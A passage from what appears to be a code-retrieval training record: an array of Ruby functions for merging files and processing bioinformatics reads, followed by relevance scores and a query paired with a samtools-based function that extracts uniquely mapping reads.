matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_lccn_oclc_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:lccn] & info[:std_nos][:lccn]).empty? &&\n !(match_info[:std_nos][:oclc] & info[:std_nos][:oclc]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_lccn_title_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:lccn] & info[:std_nos][:lccn]).empty? &&\n match_info[:title_brief] == info[:title_brief]\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_isbn_issn_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:isbn] & info[:std_nos][:isbn]).empty? &&\n !(match_info[:std_nos][:issn] & info[:std_nos][:issn]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_isbn_oclc_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:isbn] & info[:std_nos][:isbn]).empty? &&\n !(match_info[:std_nos][:oclc] & info[:std_nos][:oclc]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_isbn_title_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:isbn] & info[:std_nos][:isbn]).empty? &&\n match_info[:title_brief] == info[:title_brief]\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_issn_oclc_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:issn] & info[:std_nos][:issn]).empty? &&\n !(match_info[:std_nos][:oclc] & info[:std_nos][:oclc]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_issn_title_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:issn] & info[:std_nos][:issn]).empty? &&\n match_info[:title_brief] == info[:title_brief]\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_oclc_title_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:oclc] & info[:std_nos][:oclc]).empty? &&\n match_info[:title_brief] == info[:title_brief]\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n ### Clean up the matches\n source_to_other.each_value(&:uniq!)\n source_to_other\nend",
"def perform\n result_file = nil\n \n # Create the alignment files\n result_file = generate_alignment if @task == :all || @task == :align\n \n # Identify the clusters\n result_file = identify_clusters if @task == :all || @task == :cluster\n \n result_file\n end",
"def compose_file bucket_name:, first_file_name:, second_file_name:, destination_file_name:\n # The ID of your GCS bucket\n # bucket_name = \"your-unique-bucket-name\"\n\n # The ID of the first GCS object to compose\n # first_file_name = \"your-first-file-name\"\n\n # The ID of the second GCS object to compose\n # second_file_name = \"your-second-file-name\"\n\n # The ID to give the new composite object\n # destination_file_name = \"new-composite-file-name\"\n\n require \"google/cloud/storage\"\n\n storage = Google::Cloud::Storage.new\n bucket = storage.bucket bucket_name, skip_lookup: true\n\n destination = bucket.compose [first_file_name, second_file_name], destination_file_name do |f|\n f.content_type = \"text/plain\"\n end\n\n puts \"Composed new file #{destination.name} in the bucket #{bucket_name} \" \\\n \"by combining #{first_file_name} and #{second_file_name}\"\nend",
"def merge(*sources); end",
"def merge_all\n merge_concurrent(0)\n end",
"def merge(prt_pdb, lig_pdb, complex_pdb)\n prt_lines = File.readlines(prt_pdb)\n lig_lines = File.readlines(lig_pdb)\n\n prt_atm_lines = prt_lines.select { |line| /ATOM/ =~ line }\n lig_atm_lines = lig_lines.select { |line| /HETATM/ =~ line}\n\n f = File.open(complex_pdb, 'w')\n\n f.write(\"MODEL 1\\n\")\n prt_atm_lines.each do |line| f.write(line) end\n f.write(\"TER\\n\")\n lig_atm_lines.each do |line| f.write(line) end\n f.write(\"END\\n\")\n\n f.close()\n\nend",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def process_files files=[]\n files.each do |file|\n process_file file\n end\n end",
"def combine_files(file1, file2)\n new_coverage = combine_coverages(file1.coverage, file2.coverage)\n # NOTE: It is possible that both don't exist but eventually either one does or it's just one of the names that was\n # used in the code\n new_filename = strict_file_exists?(file1.filename) ? file1.filename : file2.filename\n SimpleCov::SourceFile.new(new_filename, new_coverage)\n end",
"def gdal_merge(input_files, output_file, merge_strategy = :lossless)\n return nil if input_files.length == 0\n return CDBTool.link_output(input_files[0], output_file) if input_files.length == 1\n\n command = case merge_strategy\n when :lossless\n \"gdal_merge.py -o #{output_file} -co BIGTIFF=YES -co COMPRESS=LZW -co NUM_THREADS=ALL_CPUS -co TILED=YES -n 0 -a_nodata 0 #{input_files.join(\" \")}\"\n when :lossy\n \"gdal_merge.py -o #{output_file} -co BIGTIFF=YES -co COMPRESS=JPEG -co TILED=YES #{input_files.join(\" \")}\"\n end\n\n merge = Mixlib::ShellOut.new(command, live_stdout: $stdout, live_stderr: $stderr)\n\n if File.exists?(output_file)\n puts \"Output exists, skipping merge command.\"\n else\n puts command\n merge.run_command\n $mosaic.log(\"#{output_file},#{File.size(output_file)},#{merge.execution_time}s\")\n end\nend",
"def writeFinalSequenceFrag()\n outFile = File.new(@seqNameRead1, \"w\")\n\n @read1FileList.each do |file|\n reader = Zlib::GzipReader.open(file)\n while(line = reader.gets)\n line.strip!\n\n if line.match(/^@/)\n @numReadsRead1 = @numReadsRead1 + 1\n\n # Read next 3 lines to complete reading 1 Fastq record\n readString = reader.gets.strip\n qualHeader = reader.gets.strip\n qualString = reader.gets.strip\n\n if line.match(/\\s\\d:N:/)\n @numFilteredRead1 = @numFilteredRead1 + 1\n writeFastqRecordToFile(outFile, line, readString, qualHeader,\n qualString)\n end\n end\n end\n reader.close\n end\n outFile.close\n end",
"def _combine\n @@round = @@round + 1\n files = @files.values\n @file_list = []\n\n files.each {|f| _include_file(f) }\n \n content = \"$theme: '\" + @options[:theme] + \"';\"\n\n content += @file_list.map {|file|\n \"@_chance_file \" + @files.key(file[:path]) + \";\\n\" + file[:content]\n }.join(\"\\n\")\n\n content\n end",
"def parse_in_order(*files); end",
"def combine_mp3s_transfer(staging_folder, dump_folder, bucket, episode)\n \n if $count > 0\n temp_file = \"temp.mp3\"\n Dir.chdir(dump_folder) do\n Dir['*.mp3'].sort.each do |fn|\n `cat \"#{fn}\" >> #{temp_file}`\n puts \"#{fn} >> #{temp_file}\"\n end\n\n file_mtime = File.mtime(temp_file).to_s.gsub(' ','%')\n file_size = File.size(temp_file)\n episode_name = get_file_as_string('episode_name.txt').gsub(\" \",\"-\")\n file_name = \"#{episode_name}_#{file_mtime}_#{file_size}\"\n final_mp3 = \"../#{staging_folder}/#{file_name}.mp3\"\n File.rename(temp_file, final_mp3)\n\n if $publish==true\n # Deploy to S3\n puts \"Finished deploying mp3 to AWS\" \n bucket.object(\"episodes/#{file_name.encrypt(ENV['ENCRYPT_SECRET'])}.mp3\").upload_file(final_mp3, acl:'public-read')\n end\n end\n end\n # Clean up dump folder\n FileUtils.rm_rf(dump_folder)\nend",
"def merge_collections mine, other, other_files, &block # :nodoc:\n my_things = mine. group_by { |thing| thing.file }\n other_things = other.group_by { |thing| thing.file }\n\n remove_things my_things, other_files, &block\n add_things my_things, other_things, &block\n end",
"def collaps_qnames(input_file, output_file)\n\t\n\t\tloci = {}\n\t\n\t\t# Read candidate loci and count reads/locus\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\t\tqname = line[0]\n\t\t\tbase = qname.gsub(/\\/[1,2]/, '')\n\t\t\tpos_a = line[1..3].join(':')\n\t\t\tpos_b = line[4..6].join(':')\n\t\t\tpos = [pos_a, pos_b].join(':')\n\n\t\t\talignment_length = line[-1]\n\t\n\t\t\tif !loci.has_key?(pos)\n\t\t\t\tloci[pos] = {:count => 1, :qnames => [qname], :l => alignment_length}\n\t\t\telse \n\t\t\t\tloci[pos][:qnames] << qname\n\t\t\t\tloci[pos][:count] += 1\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tloci.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:count], v[:l], v[:qnames].join(';')].join(\"\\t\") if v[:count] > 0\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Collapsed anchor pairs to single loci.\"\n\tend",
"def 500_files(input)\n # naive solution is to flatten and sort\n\n \nend",
"def parse_to_file(outdir)\n z_unique = File.new(outdir+\"_unique\", 'w')\n z_non_unique = File.new(outdir+\"_non_unique\", 'w')\n entries = []\n while !@filehandler.eof?\n entry1 = make_entry()\n line = @filehandler.readline()\n entry2 = make_entry()\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n # same chrosome?\n if entry1.t_name == entry2.t_name\n entries << entry2\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = true\n end\n else\n marker2 = false\n @counter_non_unique += 1\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n while entry1.q_name == entry2.q_name\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = 1\n end\n end\n end\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n end\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n z_non_unique.close\n z_unique.close\n end",
"def merge_join(key_index, file1, file2)\n # Sorting part.\n merge_sorter!(key_index, file1, file2)\n # Merging part.\n r = file1[i = 0]\n q = file2[j = 0]\n while i != file1.length && j != file2.length\n if greater_than?(r[key_index], q[key_index])\n q = file2[j += 1]\n elsif less_than?(r[key_index], q[key_index])\n r = file1[i += 1]\n else\n # The records match on the join key.\n puts \"#{r[key_index]} #{r.reject { |e| e == r[key_index] }.to_csv.chomp} #{q.reject \\\n { |e| e == r[key_index] }.to_csv.chomp}\" unless r[key_index].nil? || q[key_index].nil?\n t = file2[k = j + 1]\n # Check for further records that match with r on the join key.\n while k != file2.length && r[key_index] == t[key_index]\n puts \"#{r[key_index]} #{r.reject { |e| e == r[key_index] }.to_csv.chomp} #{t.reject \\\n { |e| e == r[key_index] }.to_csv.chomp}\" unless r[key_index].nil? || t[key_index].nil?\n t = file2[k += 1]\n end\n s = file1[l = i + 1]\n # Check for further records that match with q on the join key.\n while l != file1.length && q[key_index] == s[key_index]\n puts \"#{q[key_index]} #{q.reject { |e| e == q[key_index] }.to_csv.chomp} #{s.reject \\\n { |e| e == q[key_index] }.to_csv.chomp}\" unless q[key_index].nil? || s[key_index].nil?\n s = file1[l += 1]\n end\n r = file1[i += 1]\n q = file2[j += 1]\n end\n end\nend",
"def split_upids(idmap_file)\n puts \"split idmapping.dat to each prefix files\"\n up_refp_output = prepare_prefix_files(idmap_file, \"protein_id\")\n up_refg_output = prepare_prefix_files(idmap_file, \"gene_id\")\n\n cnt = 0\n # it is assumed that the tax_id is followed by a protein_id or gene_id\n current_tax = {upid: nil, tax_id: nil}\n taxid_missing_list = [] \n File.open(idmap_file, \"r\") do |f|\n f.each_line do |line|\n up, xref, id = line.strip.split(\"\\t\")\n case xref\n when \"NCBI_TaxID\"\n current_tax = {upid: up.split(\"-\").first, tax_id: id}\n when \"RefSeq\", \"GeneID\"\n # Push only the tax_id with refseq protein_id or gene_id\n if current_tax[:upid] == up.split(\"-\").first\n if xref == \"RefSeq\"\n prefix = id.chomp.strip[0..4]\n up_refp_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n elsif xref == \"GeneID\"\n prefix = id.chomp.strip[0]\n up_refg_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n end\n else\n taxid_missing_list.push(up)\n end\n end\n cnt += 1\n if (cnt % 100000 == 0)\n puts cnt\n end\n end\n # list of upid that can't get taxid. Depends on the order of idmapping.dat\n out = File.open(\"taxid_missing_list.json\", \"w\") unless taxid_missing_list.size == 0\n taxid_missing_list.each do |upid|\n out.puts JSON.pretty_generate(taxid_missing_list)\n end\n end\n\n # close files\n up_refp_output.each do |k, v|\n v.flush\n v.close\n end\n up_refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def export_gap_mark_tagging(options)\n input_file_spec = options['input'] || 'content_dir/at_files'\n input_base_dir_name, input_file_pattern_name = input_file_spec.split(\n Repositext::Cli::FILE_SPEC_DELIMITER\n )\n output_base_dir = options['output'] || config.base_dir('gap_mark_tagging_export_dir')\n Repositext::Cli::Utils.export_files(\n config.base_dir(input_base_dir_name),\n config.file_pattern(input_file_pattern_name),\n output_base_dir,\n /\\.at\\Z/i,\n \"Exporting AT files to gap_mark tagging\",\n options.merge(\n :output_path_lambda => lambda { |input_filename, output_file_attrs|\n input_filename.gsub(config.base_dir(input_base_dir_name), output_base_dir)\n .gsub(/\\.at\\z/, '.gap_mark_tagging.txt')\n }\n )\n ) do |contents, filename|\n outcome = Repositext::Export::GapMarkTagging.export(contents)\n if outcome.success?\n [Outcome.new(true, { contents: outcome.result, extension: 'gap_mark_tagging.txt' })]\n else\n outcome\n end\n end\n end",
"def dist_merge inputs, output, options = {}\n options[:reduce_tasks] ||= 25\n options[:partition_fields] ||= 2\n options[:sort_fields] ||= 2\n options[:field_separator] ||= '/t'\n names = inputs.map{|inp| File.basename(inp)}.join(',')\n cmd = \"#{@hadoop_home}/bin/hadoop \\\\\n jar #{@hadoop_home}/contrib/streaming/hadoop-*streaming*.jar \\\\\n -D mapred.job.name=\\\"Swineherd Merge (#{names} -> #{output})\\\" \\\\\n -D num.key.fields.for.partition=\\\"#{options[:partition_fields]}\\\" \\\\\n -D stream.num.map.output.key.fields=\\\"#{options[:sort_fields]}\\\" \\\\\n -D mapred.text.key.partitioner.options=\\\"-k1,#{options[:partition_fields]}\\\" \\\\\n -D stream.map.output.field.separator=\\\"'#{options[:field_separator]}'\\\" \\\\\n -D mapred.min.split.size=1000000000 \\\\\n -D mapred.reduce.tasks=#{options[:reduce_tasks]} \\\\\n -partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner \\\\\n -mapper \\\"/bin/cat\\\" \\\\\n -reducer \\\"/usr/bin/uniq\\\" \\\\\n -input \\\"#{inputs.join(',')}\\\" \\\\\n -output \\\"#{output}\\\"\"\n puts cmd\n system cmd\n end",
"def dist_merge inputs, output, options = {}\n options[:reduce_tasks] ||= 25\n options[:partition_fields] ||= 2\n options[:sort_fields] ||= 2\n options[:field_separator] ||= '/t'\n names = inputs.map{|inp| File.basename(inp)}.join(',')\n cmd = \"#{@hadoop_home}/bin/hadoop \\\\\n jar #{@hadoop_home}/contrib/streaming/hadoop-*streaming*.jar \\\\\n -D mapred.job.name=\\\"Swineherd Merge (#{names} -> #{output})\\\" \\\\\n -D num.key.fields.for.partition=\\\"#{options[:partition_fields]}\\\" \\\\\n -D stream.num.map.output.key.fields=\\\"#{options[:sort_fields]}\\\" \\\\\n -D mapred.text.key.partitioner.options=\\\"-k1,#{options[:partition_fields]}\\\" \\\\\n -D stream.map.output.field.separator=\\\"'#{options[:field_separator]}'\\\" \\\\\n -D mapred.min.split.size=1000000000 \\\\\n -D mapred.reduce.tasks=#{options[:reduce_tasks]} \\\\\n -partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner \\\\\n -mapper \\\"/bin/cat\\\" \\\\\n -reducer \\\"/usr/bin/uniq\\\" \\\\\n -input \\\"#{inputs.join(',')}\\\" \\\\\n -output \\\"#{output}\\\"\"\n puts cmd\n system cmd\n end",
"def liftchain(outfile)\n #Future: Add option to recycle old chainfile #\n processes = CONFIG[:processes]\n blat_opts = CONFIG[:blat_opts]\n \n cp CONFIG[:source_fa], \"#{RUNDIR}/source.fa\"\n cp CONFIG[:target_fa], \"#{RUNDIR}/target.fa\"\n\n to_2bit \"#{RUNDIR}/source.fa\"\n to_2bit \"#{RUNDIR}/target.fa\"\n\n to_sizes \"#{RUNDIR}/source.2bit\"\n to_sizes \"#{RUNDIR}/target.2bit\"\n\n # Partition target assembly.\n sh \"faSplit sequence #{RUNDIR}/target.fa #{processes} #{RUNDIR}/chunk_\"\n\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n 'faSplit -oneFile size %{this} 5000 %{this}.5k -lift=%{this}.lft &&' \\\n 'mv %{this}.5k.fa %{this}'\n\n # BLAT each chunk of the target assembly to the source assembly.\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n \"blat -noHead #{blat_opts} #{RUNDIR}/source.fa %{this} %{this}.psl\"\n\n parallel Dir[\"#{RUNDIR}/chunk_*.fa\"],\n \"liftUp -type=.psl -pslQ -nohead\" \\\n \" %{this}.psl.lifted %{this}.lft warn %{this}.psl\"\n\n # Derive a chain file each from BLAT's .psl output files.\n parallel Dir[\"#{RUNDIR}/chunk_*.psl.lifted\"],\n 'axtChain -psl -linearGap=medium' \\\n \" %{this} #{RUNDIR}/source.2bit #{RUNDIR}/target.2bit %{this}.chn\"\n\n # Sort the chain files.\n parallel Dir[\"#{RUNDIR}/chunk_*.chn\"],\n 'chainSort %{this} %{this}.sorted'\n\n # Combine sorted chain files into a single sorted chain file.\n sh \"chainMergeSort #{RUNDIR}/*.chn.sorted | chainSplit #{RUNDIR} stdin -lump=1\"\n mv \"#{RUNDIR}/000.chain\", \"#{RUNDIR}/combined.chn.sorted\"\n\n # Derive net file from combined, sorted chain file.\n sh 'chainNet' \\\n \" #{RUNDIR}/combined.chn.sorted #{RUNDIR}/source.sizes #{RUNDIR}/target.sizes\" \\\n \" #{RUNDIR}/combined.chn.sorted.net /dev/null\"\n\n # Subset combined, sorted chain file.\n sh 'netChainSubset' \\\n \" #{RUNDIR}/combined.chn.sorted.net #{RUNDIR}/combined.chn.sorted\" \\\n \" #{RUNDIR}/liftover.chn\"\nend",
"def consolidation\n end",
"def get_all_alignments_as_string\n @alignments.values.compact.collect{ |a| get_alignment_as_string(a) }.insert(0, alignment)\n end",
"def merge_gemfiles(*path, unlock: [])\n gems_remotes = Set.new\n dependencies = Hash.new do |h, k|\n h[k] = Hash.new do |h, k|\n h[k] = Hash.new do |a, b|\n a[b] = Array.new\n end\n end\n end\n path.each do |gemfile|\n bundler_def = Bundler::Dsl.evaluate(gemfile, nil, [])\n gems_remotes |= bundler_def.send(:sources).rubygems_remotes.to_set\n bundler_def.dependencies.each do |d|\n d.groups.each do |group_name|\n if !d.platforms.empty?\n d.platforms.each do |platform_name|\n dependencies[group_name][platform_name][d.name] = d\n end\n else\n dependencies[group_name][''][d.name] = d\n end\n end\n end\n end\n\n contents = []\n gems_remotes.each do |g|\n g = g.to_s\n if g.end_with?('/')\n g = g[0..-2]\n end\n contents << \"source '#{g.to_s}'\"\n end\n dependencies.each do |group_name, by_platform|\n contents << \"group :#{group_name} do\"\n by_platform.each do |platform_name, deps|\n deps = deps.values.sort_by(&:name)\n if !platform_name.empty?\n contents << \" platform :#{platform_name} do\"\n platform_indent = \" \"\n end\n deps.each do |d|\n if d.source\n options = d.source.options.map { |k, v| \"#{k}: \\\"#{v}\\\"\" }\n end\n contents << [\" #{platform_indent}gem \\\"#{d.name}\\\", \\\"#{d.requirement}\\\"\", *options].join(\", \")\n end\n if !platform_name.empty?\n contents << \" end\"\n end\n end\n contents << \"end\"\n end\n contents.join(\"\\n\")\n end",
"def create_cds_multi_fasta_file(options)\n require 'bioutils/rich_sequence_utils'\n require 'bioutils/glimmer'\n extend Glimmer\n\n default_options = {\n :cds_multi_fasta_file => \"cds_proteins.fas\",\n :verbose => false\n }\n options.reverse_merge!(default_options)\n\n options = MethodArgumentParser::Parser.check_options options do\n option :root_folder, :required => true, :type => :string\n option :cds_multi_fasta_file, :required => true, :type => :string\n option :sequence_files, :required => true, :type => :array\n\n end\n\n Dir.chdir(options[:root_folder])\n\n files_with_cds = Array.new # a list of files containing\n options[:sequence_files].each do |sequence_file|\n sequence_format = guess_sequence_format(sequence_file)\n if sequence_format == :fasta\n if options[:training_model_prefix]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => options[:training_model_prefix],:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n elsif options[:training_sequence_path]\n model_file_prefix = File.basename(options[:training_sequence_path], File.extname(options[:training_sequence_path])) + \"_glimmer\"\n if File.exists?(model_file_prefix + \".icm\")\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n else\n print \".\"\n end\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => model_file_prefix,:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training sequence ....\"\n else\n print \".\"\n end\n predict_file = predict_genes_using_glimmer(:input_sequence_path => sequence_file,\n :rich_sequence_training_path => options[:training_sequence_path],\n :glimmer_dir_path => options[:glimmer_dir],\n :suppress_messages => true)\n end\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using iterated glimmer....\"\n else\n print \".\"\n end\n predict_using_iterated_glimmer(:suppress_messages => true, :input_sequence_path => sequence_file, :glimmer_predict_filename => File.basename(sequence_file, File.extname(sequence_file)),:glimmer_dir_path => options[:glimmer_dir])\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \".predict\"\n end\n if options[:verbose]\n puts \"Converting #{sequence_file} glimmer prediction to a genbank file ....\"\n else\n print \".\"\n end\n glimmer_genbank_file = glimmer_prediction_to_rich_sequence_file(:suppress_messages => true, :glimmer_predict_file => predict_file, :input_sequence_path => sequence_file)\n files_with_cds << glimmer_genbank_file\n else\n files_with_cds << sequence_file\n end\n end\n\n cds_multi_fasta_protein_file = File.open(options[:cds_multi_fasta_file], \"w\")\n read_cds_and_write_to_file(files_with_cds, cds_multi_fasta_protein_file)\n processing_indicator(5)\n\n cds_multi_fasta_protein_file.close\n end",
"def compile_files(files)\n files.each do |base_path|\n # We do this second glob in case the path provided in the tayfile\n # references a compiled version\n Dir[@base_dir.join('src', base_path + '*')].each do |path|\n path = Pathname.new(path).relative_path_from(@base_dir.join('src'))\n file_in_path = @base_dir.join('src', path)\n file_out_path = asset_output_filename(@output_dir.join(path), @sprockets.engines.keys)\n\n if @sprockets.extensions.include?(path.extname)\n content = @sprockets[file_in_path].to_s\n else\n content = File.read(file_in_path)\n end\n\n FileUtils.mkdir_p(file_out_path.dirname)\n File.open(file_out_path, 'w') do |f|\n f.write content\n end\n end\n end\n end"
] |
[
"0.627244",
"0.6105935",
"0.60039854",
"0.58686095",
"0.56690675",
"0.5590018",
"0.556866",
"0.55033255",
"0.54632646",
"0.5396619",
"0.53854",
"0.5342837",
"0.5342266",
"0.53063905",
"0.52958137",
"0.5234907",
"0.51962095",
"0.5195997",
"0.5194503",
"0.5163467",
"0.51433927",
"0.5121362",
"0.5097203",
"0.5087505",
"0.5079219",
"0.5043532",
"0.5025654",
"0.49907675",
"0.49867225",
"0.49548012",
"0.4950227",
"0.49411485",
"0.49365535",
"0.48951596",
"0.48735565",
"0.48712978",
"0.48683238",
"0.4866746",
"0.48641786",
"0.48592395",
"0.48277566",
"0.48081517",
"0.47908905",
"0.47616646",
"0.4757657",
"0.47544533",
"0.47324783",
"0.47308615",
"0.47094497",
"0.47036338",
"0.46891367",
"0.4687731",
"0.4677225",
"0.4676578",
"0.46687",
"0.46436527",
"0.4639864",
"0.4639122",
"0.4638224",
"0.46292782",
"0.4604604",
"0.46036103",
"0.46008894",
"0.4590534",
"0.4577429",
"0.45659137",
"0.4561208",
"0.4561208",
"0.45431095",
"0.45375663",
"0.45337754",
"0.4526087",
"0.4525776",
"0.45235586",
"0.45231047",
"0.451901",
"0.45022237",
"0.45019612",
"0.4501929",
"0.44908783",
"0.4481096",
"0.44657993",
"0.44615817",
"0.4452506",
"0.44427848",
"0.44112468",
"0.44089225",
"0.44050822",
"0.43962005",
"0.43938315",
"0.43914685",
"0.43856242",
"0.43839625",
"0.43839625",
"0.43835887",
"0.43822983",
"0.43816715",
"0.43787426",
"0.43732274",
"0.4370796"
] |
0.7179231
|
0
|
Extracts uniquely mapping reads
|
def extract_uni
# Extract all uniquely mapping reads
run_cmd(
"samtools view -H #{@names.get('mapped_merged')} " \
"> #{@names.get('mapped_uniq')}"
)
run_cmd(
"samtools view -h #{@names.get('mapped_merged')} " \
"| grep -P 'NH:i:1(\t|$)' " \
">> #{@names.get('mapped_uniq')}"
)
run_cmd(
"samtools sort -o #{@names.get('mapped_uniqsort')} -O bam -T " \
"tmp.bam #{@names.get('mapped_uniq')}"
)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def remapped_reads(input_file, output_file, read_length, mm=2)\n\t\tremapped = {}\n\t\t\n\t\t# Filter remapped reads\n\t\tinput_file.each do |line|\n\t\t\tmdz = line.match(/MD:Z:\\S*/).to_s\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\tqname, mate = line[0].split('/')\n\t\t\tpos = line[2].split(':')\n\t\t\tcigar = line[5]\n\t\n\t\t\tif !remapped.has_key?(qname) && Alignment.max_mismatches?(mdz, mm) && cigar == \"#{read_length}M\"\n\t\t\t\tremapped[qname] = [pos, mate]\n\t\t\telse\t\n\t\t\t\tremapped.delete(qname)\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tremapped.each {|k, v| output.puts [\"#{k}/#{v[-1]}\", v[0]].join(\"\\t\")}\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found remapped reads.\"\n\tend",
